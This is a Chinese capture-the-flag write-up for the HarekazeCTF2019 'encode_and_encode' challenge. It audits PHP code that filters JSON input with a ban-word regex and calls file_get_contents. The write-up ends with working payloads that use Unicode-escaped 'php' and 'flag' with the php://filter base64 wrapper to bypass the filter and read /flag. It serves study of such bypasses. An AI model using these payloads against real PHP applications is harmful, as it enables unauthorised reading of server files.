[HarekazeCTF2019]encode_and_encode

掌握知识

​ JSON对Unicode字符的解析转义，json格式的构建，代码审计，php伪协议的利用，file_get_contents函数结合php://input的使用

解题思路

1. 打开题目链接，前两个无所用处，直接直奔主题，查看源代码，进行代码审计

<?php
error_reporting(0);if (isset($_GET['source'])) {show_source(__FILE__);exit();
}function is_valid($str) {$banword = [// no path traversal'\.\.',// no stream wrapper'(php|file|glob|data|tp|zip|zlib|phar):',// no data exfiltration'flag'];$regexp = '/' . implode('|', $banword) . '/i';if (preg_match($regexp, $str)) {return false;}return true;
}$body = file_get_contents('php://input');
$json = json_decode($body, true);if (is_valid($body) && isset($json) && isset($json['page'])) {$page = $json['page'];$content = file_get_contents($page);if (!$content || !is_valid($content)) {$content = "<p>not found</p>\n";}
} else {$content = '<p>invalid request</p>';
}// no data exfiltration!!!
$content = preg_replace('/HarekazeCTF\{.+\}/i', 'HarekazeCTF{&lt;censored&gt;}', $content);
echo json_encode(['content' => $content]);

代码分析

2. 对代码进行分析，一开始就不用多说了，又source参数就显示源码，之后代码终止。接下来是一个自定义的is_valid函数，看其里面的函数和变量名称，很明显就是对传入的参数进行过滤用的。过滤了目录遍历操作，差不多全部的伪协议，还有flag。

function is_valid($str) {$banword = [// no path traversal'\.\.',// no stream wrapper'(php|file|glob|data|tp|zip|zlib|phar):',// no data exfiltration'flag'];$regexp = '/' . implode('|', $banword) . '/i';if (preg_match($regexp, $str)) {return false;}return true;
}

3. 函数下面的两个变量，利用了常见的file_get_contents函数绕过的思想，会将php://input输入的数据赋值给body变量，json变量保存对body解json格式后的内容。body是可控的变量，看json变量的赋值，看来是需要传递一个json格式的参数了

$body = file_get_contents('php://input');
$json = json_decode($body, true);

4. 接下来就是关键地方了，第一个判断，需要body变量的内容通过is_valid函数，即不能有过滤的内容。json要有一个page参数，结合上面的代码，传递的json格式的键就是page了。通过判断会对page的值进行文件包含，后面的判断就是判断文件是否存在的和值是否存在过滤内容。

if (is_valid($body) && isset($json) && isset($json['page'])) {$page = $json['page'];$content = file_get_contents($page);if (!$content || !is_valid($content)) {$content = "<p>not found</p>\n";}
} else {$content = '<p>invalid request</p>';
}

5. 最后两个函数是对内容进行过滤，正则匹配明文的flag字段，也就意味着输出的结果需要经过加密，也就需要用到php伪协议读取了

// no data exfiltration!!!
$content = preg_replace('/HarekazeCTF\{.+\}/i', 'HarekazeCTF{<censored>}', $content);
echo json_encode(['content' => $content]);

6. 分析之后就很明了了，post传递一个json格式的字符串，键为page，值为文件包含的参数，也就是flag文件，关键的地方就在于不能有php和flag字段，需要绕过，能想到的方法就是编码绕过了，中间加''识别错误了直接。
7. 上网搜索了一下json字符串内容的解析，找到了一篇json可以处理unicode字符，明白了这个知识点，直接将php和flag转成unicode编码，构建json字符串进行post传参

8. 先读取一下flag.php文件，回显文件不存在，在读取一下根目录下的flag文件，成功拿下flag

9. 其实只看paylaod倒是不算难，知识代码分析过程，解题过程和知识点的了解总会让人很难向前。这个代码理解起来还可以，能想到json字符串和page为键，文件名为值就证明没问题了。最难得也就是json解析unicode这个知识点了，你不知道搜索起来还真挺费时间的，知道这个知识点的，直接就解出来了，ctf的题难就难在你知不知这个知识点，会不会用这个知识点了。这次的文件包含函数倒是把两个php伪协议都用到了，全都巩固了一下。input替换文件包含结果或命令执行；filter编码形式读取文件内容，所以对上面的响应结果进行base64解密也就拿下了flag了

关键paylaod

{"page":"php://filter/convert.base64-encode/resource=/flag"}
{"page":"\u0070\u0068\u0070://filter/convert.base64-encode/resource=/\u0066\u006c\u0061\u0067"}